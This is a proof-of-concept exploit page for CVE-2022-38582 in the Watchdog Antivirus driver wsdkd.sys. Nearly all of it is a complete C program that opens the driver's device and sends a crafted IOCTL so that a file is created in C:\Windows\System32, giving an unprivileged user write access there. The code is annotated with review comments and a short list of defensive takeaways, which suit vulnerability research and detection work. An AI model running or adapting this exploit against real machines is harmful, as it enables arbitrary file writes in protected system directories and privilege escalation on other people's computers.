
CVE-2022-38582: PoC for Watchdog AV (CVE-2022-38582)

Incorrect access control in the anti-virus driver wsdkd.sys of Watchdog Antivirus v1.4.158 allows attackers to write arbitrary files.


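// Proof-of-concept for CVE-2022-38582 (Watchdog Antivirus v1.4.158, driver
// wsdkd.sys), reformatted from the collapsed listing on the page.
//
// Author's notes: exploitation requires issuing the IOCTL described below;
// once complete, a low integrity user may obtain write-privileges to the file
// by re-opening it with CreateFileA / NtCreateFile.
//
// NOTE(review): the advisory text only says "incorrect access control ...
// allows attackers to write arbitrary files". Presumably the driver performs
// the file create in kernel context without checking the caller's rights --
// confirm against the driver before relying on that description.
//
// Defensive takeaways:
//   * The device \\.\wsdk is opened here with GENERIC_READ | GENERIC_WRITE by
//     an ordinary process; handle opens to that device from processes other
//     than the product's own components are worth alerting on.
//   * File creation under protected directories (the sample path is in
//     System32) attributed to an unexpected process is the visible effect.
//   * Removing or updating the affected product, or blocking the driver with
//     a driver block policy, removes the exposed IOCTL. Whether a fixed build
//     exists is not stated on this page.
#include <Windows.h>
#include <stdio.h>

// Control code sent to the driver; value taken from the original listing.
#define IOCTL_WAV_CREATE_FILE 0x80002004

// Win32 path of the device object exposed by the driver.
const char* g_DeviceName = R"(\\.\wsdk)";

BOOL WAV_CreateFile(HANDLE hDevice, const wchar_t* strFileName, BOOL bOpenExisting, PHANDLE lpOutHandle);

// Input buffer for IOCTL_WAV_CREATE_FILE, laid out as in the original listing.
typedef struct WSDK_CREATE
{
    DWORD dwDisposition;
    DWORD dwAccessMask;                 // author's note: 0x10 (meaning not stated on the page)
    BYTE  reserved0[0x6c];
    WCHAR wstrFileName[MAX_PATH + 1];   // NT-style path, NUL-terminated
} WSDK_CREATE, * PWSDK_CREATE;

// Start of the output buffer as this code interprets it.
typedef struct WSDK_CREATE_OUT
{
    HANDLE   hFile;
    NTSTATUS status;
} WSDK_CREATE_OUT, * PWSDK_CREATE_OUT;

// Sends IOCTL_WAV_CREATE_FILE for strFileName and returns the handle value the
// driver reports.
//
// Parameters:
//   hDevice       - open handle to the driver's device.
//   strFileName   - NUL-terminated path, at most MAX_PATH characters.
//   bOpenExisting - unused by this implementation; kept for the interface.
//   lpOutHandle   - receives the reported handle on success.
//
// Returns TRUE only when DeviceIoControl succeeds and the output buffer holds
// a non-NULL handle with a zero status; FALSE otherwise.
BOOL WAV_CreateFile(HANDLE hDevice, const wchar_t* strFileName, BOOL bOpenExisting, PHANDLE lpOutHandle)
{
    UNREFERENCED_PARAMETER(bOpenExisting);

    // Declared up front so the jumps to the cleanup label are valid in C++.
    BOOL             bSuccess = FALSE;
    DWORD            dwBytesReturned = 0;
    HANDLE           hHeap = GetProcessHeap();
    LPVOID           lpOutBuffer = NULL;
    PWSDK_CREATE     lpCreateArgs = NULL;
    PWSDK_CREATE_OUT lpOutInfo = NULL;
    int              cchFileName = 0;
    BOOL             bRes = FALSE;

    if (!lpOutHandle || !strFileName)
    {
        return FALSE;
    }

    // The original copied the name without a length check, so a long path
    // overran wstrFileName on the heap. Reject anything that would not leave
    // room for the terminator.
    cchFileName = lstrlenW(strFileName);
    if (cchFileName > MAX_PATH)
    {
        return FALSE;
    }

    lpOutBuffer = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x1000);
    if (!lpOutBuffer)
    {
        goto cleanup;
    }

    lpCreateArgs = (PWSDK_CREATE)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(WSDK_CREATE));
    if (!lpCreateArgs)
    {
        goto cleanup;
    }

    lpCreateArgs->dwAccessMask = 1;
    lpCreateArgs->dwDisposition = 0;
    // The buffer is zero-initialised, so the copied name stays NUL-terminated.
    memcpy(lpCreateArgs->wstrFileName, strFileName, (size_t)cchFileName * sizeof(wchar_t));

    bRes = DeviceIoControl(
        hDevice,
        IOCTL_WAV_CREATE_FILE,
        lpCreateArgs, sizeof(WSDK_CREATE),
        lpOutBuffer, 0x1000,
        &dwBytesReturned,
        NULL
    );
    if (!bRes)
    {
        // DWORD is unsigned long, hence %lx. The original returned here
        // without freeing either allocation.
        printf("DeviceIoControl - %lx\n", GetLastError());
        goto cleanup;
    }

    lpOutInfo = (PWSDK_CREATE_OUT)lpOutBuffer;
    if (lpOutInfo->hFile && !lpOutInfo->status)
    {
        *lpOutHandle = lpOutInfo->hFile;
        bSuccess = TRUE;
    }

cleanup:
    if (lpCreateArgs)
    {
        HeapFree(hHeap, 0, lpCreateArgs);
    }
    if (lpOutBuffer)
    {
        HeapFree(hHeap, 0, lpOutBuffer);
    }
    return bSuccess;
}

// Opens the device, issues one request for the sample path and prints the
// handle value that comes back.
int main()
{
    HANDLE hDevice = CreateFileA(
        g_DeviceName,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    if (!hDevice || hDevice == INVALID_HANDLE_VALUE)
    {
        printf("CreateFileA - %lx\n", GetLastError());
        return -1;
    }

    HANDLE hFile = 0;
    BOOL bResult = WAV_CreateFile(hDevice, LR"(\??\C:\Windows\System32\lmfao.dll)", FALSE, &hFile);
    if (bResult)
    {
        printf("Got handle to file: %p\n", hFile);
    }

    // hFile is left for process exit to release: the page does not show
    // whether the reported value is a handle valid in this process.
    CloseHandle(hDevice);
    return 0;
}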
